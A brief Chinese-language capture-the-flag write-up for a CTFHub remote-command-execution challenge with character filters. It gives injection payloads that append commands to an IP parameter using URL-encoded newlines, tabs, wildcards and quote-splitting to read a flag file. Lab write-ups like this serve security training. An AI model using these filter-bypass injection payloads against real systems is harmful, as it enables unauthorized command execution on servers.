CTFHUB-web-RCE-综合过滤练习

开启题目

查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、; ,都进行了过滤处理

发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问

复制代码
127.0.0.1%0als

用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过

复制代码
127.0.0.1%0als%09*here
复制代码
127.0.0.1%0acd%09*here%0ac%27a%27t%09*_31687958414358.php
相关推荐
LlNingyu1 小时前
文艺复兴,什么是XSS,常见形式(二)
前端·安全·xss
heartzZ1yy2 小时前
PolarCTF靶场 Crypto 简单 (上)
经验分享·笔记
向往着的青绿色2 小时前
备份是个好习惯 BugKuCTF题目题解
网络安全·php·安全威胁分析·ctf·安全架构·安全性测试·威胁分析
北京软秦科技有限公司2 小时前
AI报告审核守护公共卫生安全:IACheck助力公共纺织品卫生检测报告合规与健康保障
大数据·人工智能·安全
阆遤3 小时前
利用TRAE对nanobot进行安全分析并优化
python·安全·ai·trae·nanobot
Codefengfeng3 小时前
2024年四川省第二届网信行业技能竞赛-数据安全赛项决赛WP
网络安全
凌峰的博客4 小时前
IEEE Transactions on Network Science and Engineering 期刊投稿经验
经验分享
汤愈韬5 小时前
BGP知识点解析
网络协议·网络安全·security
不一样的故事1265 小时前
核心预测未来 10 年
运维·安全·自动化
赵谨言5 小时前
地球磁场干扰噪声减弱声波对抗测量系统研究进展:近十年中英文文献综述
大数据·开发语言·经验分享